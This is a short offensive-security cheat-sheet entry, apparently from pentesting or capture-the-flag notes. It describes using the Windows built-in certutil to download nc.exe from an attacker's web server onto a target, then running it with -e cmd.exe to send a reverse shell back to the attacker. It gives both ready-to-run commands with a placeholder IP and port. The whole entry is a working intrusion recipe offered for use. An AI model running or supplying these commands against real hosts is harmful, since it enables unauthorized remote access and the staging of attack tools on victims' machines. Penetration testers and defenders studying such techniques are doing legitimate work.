Windows File Transfer (certutil / nc)
Pivoting & Transferwindowstool
Summary
Downloads a binary onto a Windows host with certutil, then uses the transferred nc.exe to spawn a reverse shell back to the attacker.
Walkthrough
Use certutil as a built-in downloader to pull tools onto a Windows target, then run them.
Steps
- Host the file (e.g.
nc.exe) on your attacker machine's web server. - Download it with
certutil -urlcache -split -fto a writable path likeC:/Users/Public/Documents. - Run the transferred
nc.exe -e cmd.exe <IP> 4444to send a reverse shell to your listener.
Commands
cmd
certutil -urlcache -split -f http://<IP>:80/nc.exe C:/Users/Public/Documents/nc.exe
cmd
cmd.exe /c C:/Users/Public/Documents/nc.exe -e cmd.exe <IP> 4444